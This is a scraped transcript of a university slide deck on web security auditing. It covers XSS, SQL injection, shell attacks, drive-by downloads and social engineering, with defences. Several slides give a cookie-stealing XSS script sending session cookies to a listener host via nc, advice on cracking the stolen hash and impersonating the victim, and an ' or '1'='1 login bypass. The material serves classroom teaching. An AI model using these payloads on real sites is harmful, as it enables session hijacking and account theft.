Presentation is loading. Please wait.

Presentation is loading. Please wait.

Auditing Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Published byAllison Paul Modified over 9 years ago

Similar presentations

Presentation on theme: "Auditing Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure."— Presentation transcript:

1 Auditing Web Security

2 Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure and current trends of Web threat Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks

3 Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total attack attempts observed on the Net are against Web applications > 80% of vulnerabilities discovered are in web apps > 80% of vulnerabilities discovered are in web apps Independent security audit Independent security audit Regulatory compliance Regulatory compliance

4 Anatomy of Web Attacks 1. Attacker breaks into a legitimate website and posts malware Malware is no longer exclusive to malicious Web sites. 2. Attacking end-user machines. Malware on a Web site makes its way down on to a user’s machine when that user visits the host Web site. “Drive-by-download” – happens automatically with no user interaction required Additional techniques which do require some input from the user, but in practice are equally, if not more so, effective. 3. Leveraging end user machines for malicious activity.

5 Anatomy of Web Attacks Source: Web Based Attacks, Symantec 2009

6 Big trend: software as a (Web-based) service Big trend: software as a (Web-based) service –Online banking, shopping, government, etc. –Cloud computing Applications hosted on Web servers Applications hosted on Web servers –Written in a mixture of PHP, Java, Perl, Python, C, ASP Security is rarely the main concern Security is rarely the main concern –Poorly written scripts with inadequate input validation –Sensitive data stored in world-readable files Web Applications

7 Runs on a Web server or application server Runs on a Web server or application server Takes input from Web users (via Web server) Takes input from Web users (via Web server) Interacts with back-end databases and third parties Interacts with back-end databases and third parties Prepares and outputs results for users (via Web server) Prepares and outputs results for users (via Web server) –Dynamically generated HTML pages –Contain content from many different sources, often including regular users Blogs, social networks, photo-sharing websites… Blogs, social networks, photo-sharing websites… Web advertisements, usually third party Web advertisements, usually third party –A webpage can have content coming from 10-20 different domains Typical Web Application Design

8 Two Sides of Web Security Web browser (front end) Web browser (front end) –Can be attacked by any website it visits –Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data Web application (back end) Web application (back end) –Runs at website Banks, online merchants, blogs, Google Apps, etc. Banks, online merchants, blogs, Google Apps, etc. –Written in Javascript, PHP, ASP, JSP, Ruby, … –Many potential bugs: XSS, SQL injection, XSRF –Attacks lead to stolen credit cards, defaced sites, etc.

9 Chicago Tribune Home Page

10 How Are Legitimate Web Sites Compromised? 1. SQL Injection Attacks 2. Malicious Advertisements –Many Web sites today display advertisements hosted by third-party advertising sites –Volume of ads published automatically makes detection difficult –Random appearances further compounds the detection 3. Search Engine Result Redirection 4. Attacks on the backend virtual hosting companies 5. Cross-site scripting (XSS) attacks 6. Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)

11

12 slide 12JavaScript Language executed by browser Language executed by browser –Scripts are embedded in Web pages –Can run before HTML is loaded, before page is viewed, while it is being viewed or when leaving the page Used to implement “active” web pages Used to implement “active” web pages –AJAX, huge number of Web-based applications Many security and correctness issues Many security and correctness issues –Attacker gets to execute some code on user’s machine –Often used to exploit other vulnerabilities

13 Cross Site Scripting Attacker goal: their code into browser Attacker goal: their code into browser XSS forces a website visitor to execute malicious code in his/her browser XSS forces a website visitor to execute malicious code in his/her browser Count for roughly 80% of all documented security vulnerabilities Count for roughly 80% of all documented security vulnerabilities

14 XSS Risks XSS abuses render engines or plug-ins XSS abuses render engines or plug-ins Steal browser cookies Steal browser cookies Steal session info for replay attack Steal session info for replay attack Malware or bot installation Malware or bot installation Redirect or phishing attempt Redirect or phishing attempt

15 XSS Example 1 Trudy posts the following JavaScript on a message board: Trudy posts the following JavaScript on a message board: var url = "http://machineaddress:5000/index.html?cookie= “+ encodeURI(document.cookie); </script> Then run a TCP server listening on port 5000 with e.g., nc –l 5000 Then run a TCP server listening on port 5000 with e.g., nc –l 5000 When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

16 XSS Demo Instructions Set port forward to bypass the firewall Set port forward to bypass the firewall ssh -L 8000:netsec-demos:2000 guest@netsec- 1.cs.northwestern.edu guest@netsec- 1.cs.northwestern.eduguest@netsec- 1.cs.northwestern.edu Note: 8000 is the local port, it's forwarded to netsec- demos port 2000 through netsec-1 Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000 Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000http://localhost:8000 http://netsec-demos.cs.northwestern.edu:2000http://localhost:8000 http://netsec-demos.cs.northwestern.edu:2000

17 XSS Demo Instructions (II) Login as ychen and post the script with a sexy title (e.g., hot game!) Login as ychen and post the script with a sexy title (e.g., hot game!) var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie="; var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie="; url = url + encodeURI(document.cookie); url = url + encodeURI(document.cookie); new Image().src=url; new Image().src=url; Hi Everyone! Thanks for your cookies! Hi Everyone! Thanks for your cookies! Ssh to that machine (e.g., cal.cs.northwestern.edu) and run Ssh to that machine (e.g., cal.cs.northwestern.edu) and run nc –l 5000

18 Simple XSS Code var url = "http://machineaddress:5000/index.html? cookie=“+ encodeURI(document.cookie); document.cookie is the browser's entire cookie for the current website document.cookie is the browser's entire cookie for the current website encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL –E.g., changing the space character to %20 –Make the URL less suspicious

19 What can Attacker Do with the Cookie? Another user test458 login as and when clicking the post, cookie is sent to the attacker Another user test458 login as and when clicking the post, cookie is sent to the attacker Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker For more info, http://netsec.cs.northwestern.edu/resources/password- cracking/ For more info, http://netsec.cs.northwestern.edu/resources/password- cracking/ Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob

20 XSS Detection A client usually is not supposed to send scripts to servers A client usually is not supposed to send scripts to servers If the server receives … or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred If the server receives … or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred –A sanitized script could look like &ls;SCRIPT>… Any user input must be preprocessed before it is used inside HTML Any user input must be preprocessed before it is used inside HTML

21 SQL Injection Malicious SQL statements run on a database and thus attack the server –XSS can only target other users

22 SQL Injection Example Trudy accesses Bob’s website; in which he does not validate input on his sign in form Trudy accesses Bob’s website; in which he does not validate input on his sign in form –Runs a SQL statement like the following: –select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; Set username to ' or '1'='1 Set username to ' or '1'='1 select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’; select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’; Effect: picks any row where the username is blank and the password matches or any row where true. Effect: picks any row where the username is blank and the password matches or any row where true. Add “limit 1” to pick the first row Add “limit 1” to pick the first row

23 SQL Injection Detection Input validation on any outgoing SQL statements from the web server to the database server Input validation on any outgoing SQL statements from the web server to the database server –Filter Apostrophes, semicolons, percent symbols, hyphens, underscores, … Apostrophes, semicolons, percent symbols, hyphens, underscores, … Any character that has special meanings must be escaped,.e.g., convert ’ into \’ Any character that has special meanings must be escaped,.e.g., convert ’ into \’ –Only works for string inputs –Different databases have different rules for escaping –Check the data type (e.g., make sure it’s an integer)

24 Shell Attacks Control an actual machine like a web server

25 Shell Attacks Inject commands into scripts that use Linux utilities Inject commands into scripts that use Linux utilities –E.g., with “;” as command separator in UNIX/LINUX CGI programs like perl can use command-line programs (e.g. grep, ls) CGI programs like perl can use command-line programs (e.g. grep, ls) Unsanitized input as arguments can lead to command execution. Unsanitized input as arguments can lead to command execution.

26 Defense Approaches Web firewall/IDS Web firewall/IDS –ModSecurity for Apache –Commercial: SecureSphere from Imperva Static code analysis Static code analysis –Open source: Nikto –Commercial: Acutenix Web Vulnerability Scanner Acutenix Web Vulnerability Scanner N-stalker N-stalker Education on good coding Education on good coding –HTML encoding on input (server-side) –Input validation/filtering

27 GETTING ONTO A USER’S COMPUTER Source: Web Based Attacks, Symantec 2009

28 Automatic Attack Exposure Techniques used to deliver malware from Websites to a users computer. Techniques used to deliver malware from Websites to a users computer. Exposure Exposure –Browsing a website –No user interaction is required –Executable content is automatically downloaded

29 Social Engineering Source: Web Based Attacks, Symantec 2009 People are tricked into performing actions they would not otherwise want to perform

30 Types of Social Engineering Attacks Fake Codec Fake Codec Malicious Peer-to-Peer (P2P) Files Malicious Peer-to-Peer (P2P) Files Malicious Advertisements Malicious Advertisements Fake Scanner Web Page Fake Scanner Web Page Blog Spam Blog Spam Other Attack Vectors Other Attack Vectors

31 Fake Codec User is prompted to install a missing codec User is prompted to install a missing codec Codec is actually malware code Codec is actually malware code –Usually a trojan horse

32 Malicious Peer-to-Peer (P2P) Files Malware authors bind content into popular applications Malware authors bind content into popular applications –Files named after celebrities, popular bands –Uploaded to popular P2P sites where they are downloaded by unsuspecting users Openly available how-to materials on the internet Openly available how-to materials on the internet –Details how to build and distribute malware –Pay-Per-Install malware

33 Fake Scanner Web Page Create a web site or product that misrepresents the truth Create a web site or product that misrepresents the truth –JavaScript pop-ups notifying of false need to install operating system updates Source: Web Based Attacks, Symantec 2009 –Tools that claim to scan for and remove adult images, etc.

34 Blog Spam Alluring links posted on blogs Alluring links posted on blogs –Links embedded in blog comments –Direct users to sites that leverage social engineering tricks or browser exploits to spread malware

35 Other Attack Vectors Spam Spam –Emails contain links directing people to drive by download, fake scanner/codec, and malware sites Pirated software sites Pirated software sites –Pirated versions of software are bundled with or comprised solely of trojan horses

36 Other Attack Vectors What is buffer overflow? What is buffer overflow? Hackers typically break into a remote system by exploiting some vulnerability of its software --- a programming or configuration bug that makes it possible to subvert the software and have it execute unplanned instructions. Hackers typically break into a remote system by exploiting some vulnerability of its software --- a programming or configuration bug that makes it possible to subvert the software and have it execute unplanned instructions. buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in the memory. This allows an attacker to overwrite data that controls the program execution path and hijack the control of the program to execute the attacker’s code instead the process code. buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in the memory. This allows an attacker to overwrite data that controls the program execution path and hijack the control of the program to execute the attacker’s code instead the process code.

37 How to Protect Yourself Update and Patch Software Update and Patch Software –Get latest OS, Browser, Application patches –Browswer Plug-in updates often forgotten Endpoint Protection Software Endpoint Protection Software –Anti-virus software for signature based detection and behavioral monitoring –Update Protection Software Subscription Could miss 70,000 new unique virus variants for one week Could miss 70,000 new unique virus variants for one week Be Suspicious Be Suspicious –Avoid things that seem too good to be true –Use safe search functionality in browsers Adopt Strong Password Policy Adopt Strong Password Policy

Download ppt "Auditing Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
1 MTvScan (Malware, Trojan, Viruses Scanner) Enterprise Class Security Scanner.

1 MTvScan (Malware, Trojan, Viruses Scanner) Enterprise Class Security Scanner.
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
Web Based Attacks SymantecDefense Fantastic Four Casey Ford Mike Lombardo Ragnar Olson Maninder Singh.

Web Based Attacks SymantecDefense Fantastic Four Casey Ford Mike Lombardo Ragnar Olson Maninder Singh.
Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.
Security+ Guide to Network Security Fundamentals, Third Edition

Security+ Guide to Network Security Fundamentals, Third Edition
Website Development with PHP and MySQL Introduction.

Website Development with PHP and MySQL Introduction.
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.

Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
269200 Web Programming Language Dr. Ken Cosh Week 1 (Introduction)

Web Programming Language Dr. Ken Cosh Week 1 (Introduction)
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

Similar presentations

Ads by Google